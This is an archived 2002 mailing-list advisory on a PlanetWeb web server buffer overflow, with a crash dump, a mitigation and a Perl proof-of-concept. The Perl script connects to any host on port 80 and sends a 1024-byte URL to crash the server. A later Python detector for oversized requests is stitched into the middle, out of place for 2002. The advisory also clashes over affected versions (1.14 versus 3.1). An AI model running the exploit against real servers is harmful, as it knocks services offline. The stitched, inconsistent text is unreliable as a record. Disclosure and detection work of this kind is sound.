Planet Web Software Buffer Overflow

From: UkR security team™ (cuctemaat_private)
Date: Sat Sep 14 2002 - 14:38:35 PDT

    :UkR security team presents:
    
    Release Date:  September 14, 2002
    Product     :  PlanetWeb Software v1.14 and earlier versions
    Vendor      :  PlanetDNS (http://www.planetdns.net)
    Type        :  Buffer Overflow
    Author      :  UkR-XblP (cuctemaat_private)
    Platforms   :  Microsoft Windows Variants
    
    About PlanetWeb:
    PlanetWeb is a complete commercial software package that provides you with
    everything you need to run your own website directly from your computer.
    It includes our lightning-fast web server with integrated PHP support,
    so you can create sophisticated web pages without doing any configuration!
    
    Overview:
    A buffer overflow exists in versions 3.1 and previous of PlanetWeb Software.
    Exploitation of this vulnerability allows remote execution of arbitrary code
    with daemon privileges.
    
    Detailed Description:
    Sending a GET request containing a URL of approximately 1024 characters or
    more causes Planet Web Server to crash. Exploitation is possible, and
    proof-of-concept code has been authored to demonstrate this problem.
    
    Result:
    PDNSC caused an invalid page fault in
    module KERNEL32.DLL at 0167:bff9db61.
    Registers:
    EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
    EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
    ECX=00000000 DS=016f ESI=81770a14 FS=4217
    EDX=bff76855 ES=016f EDI=02150120 GS=0000
    Bytes at CS:EIP:
    53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89 
    Stack dump:
    
    Solution:
    Disable the Planet Web Server until a patch is made available by the vendor.
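    As an added defender's example (not part of this advisory and not code from
    PlanetDNS), the following Python checks HTTP request lines for the condition
    the description above names, a request-target of roughly 1024 characters or
    more, so a reverse proxy, log review or IDS rule can block or alert on such
    requests while the server stays disabled and until the vendor patch arrives.
    The threshold constant, the function names and the sample request lines are
    assumptions constructed for this example.

```python
import re

# Threshold taken from the advisory text: URLs of roughly 1024 characters or
# more crash the server, so anything at or above it is treated as hostile.
LONG_TARGET_THRESHOLD = 1024

# Request-line grammar: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(
    r"^(?P<method>[A-Z]+) (?P<target>\S+) (?P<version>HTTP/\d\.\d)$"
)


def parse_request_line(line):
    """Return (method, target, version), or None if the line is not a
    well-formed HTTP request line."""
    match = REQUEST_LINE.match(line.rstrip("\r\n"))
    if match is None:
        return None
    return match.group("method"), match.group("target"), match.group("version")


def filler_ratio(target):
    """Fraction of the request-target taken up by its single most common
    character. A ratio near 1.0 indicates padding such as 'AAAA...' rather
    than a real path, which is useful context in an alert."""
    if not target:
        return 0.0
    most_common = max(target.count(ch) for ch in set(target))
    return most_common / len(target)


def classify_request_line(line, threshold=LONG_TARGET_THRESHOLD):
    """Classify one request line as 'ok', 'oversized' (request-target length
    at or above the threshold) or 'malformed' (does not parse at all)."""
    parsed = parse_request_line(line)
    if parsed is None:
        return {"verdict": "malformed", "target_len": 0, "filler_ratio": 0.0}
    method, target, version = parsed
    verdict = "oversized" if len(target) >= threshold else "ok"
    return {
        "verdict": verdict,
        "method": method,
        "target_len": len(target),
        "filler_ratio": round(filler_ratio(target), 3),
    }


def scan_request_lines(lines, threshold=LONG_TARGET_THRESHOLD):
    """Return [(line_index, verdict, target_len)] for every line that should
    be blocked or alerted on; well-formed, short requests are not reported."""
    flagged = []
    for index, line in enumerate(lines):
        info = classify_request_line(line, threshold)
        if info["verdict"] != "ok":
            flagged.append((index, info["verdict"], info["target_len"]))
    return flagged


# Constructed sample input (not captured traffic): a normal request, a request
# shaped like the advisory's proof of concept (1024 filler bytes after "/"),
# another normal request, and a line that is not HTTP at all.
SAMPLE_REQUEST_LINES = [
    "GET /index.php HTTP/1.0",
    "GET /" + "A" * 1024 + " HTTP/1.0",
    "GET /about/team.html HTTP/1.1",
    "not an http request line",
]

if __name__ == "__main__":
    for index, verdict, length in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"line {index}: {verdict} (request-target length {length})")
```

    The check keys on the length of the request-target alone, which is the
    trigger the advisory describes; the filler ratio is reported only as
    supporting context so an analyst can tell padding from a genuinely long
    but legitimate path.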
    
    ----------------- exploit - cut here -----------------
    
    #!/usr/bin/perl
    # PlanetWeb Software perl exploit
    # by UkR-XblP / UkR security team
    use strict;
    use warnings;
    use IO::Socket;
    
    unless (@ARGV == 1) { die "usage: $0 vulnerable_server ...\n" }
    my $host = shift(@ARGV);
    
    # Connect to the web server on TCP port 80.
    my $remote = IO::Socket::INET->new( Proto     => "tcp",
                                         PeerAddr  => $host,
                                         PeerPort  => "http(80)",
                                       );
    unless ($remote) { die "cannot connect to http daemon on $host\n" }
    
    # Request a URL of 1024 bytes, the length the advisory reports crashes the server.
    my $xblp = "A" x 1024;
    my $exploit = "GET /".$xblp." HTTP/1.0\n\n";
    $remote->autoflush(1);
    print $remote $exploit;
    close $remote;
    
    ----------------- exploit - cut here -----------------

    This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 09:17:10 PDT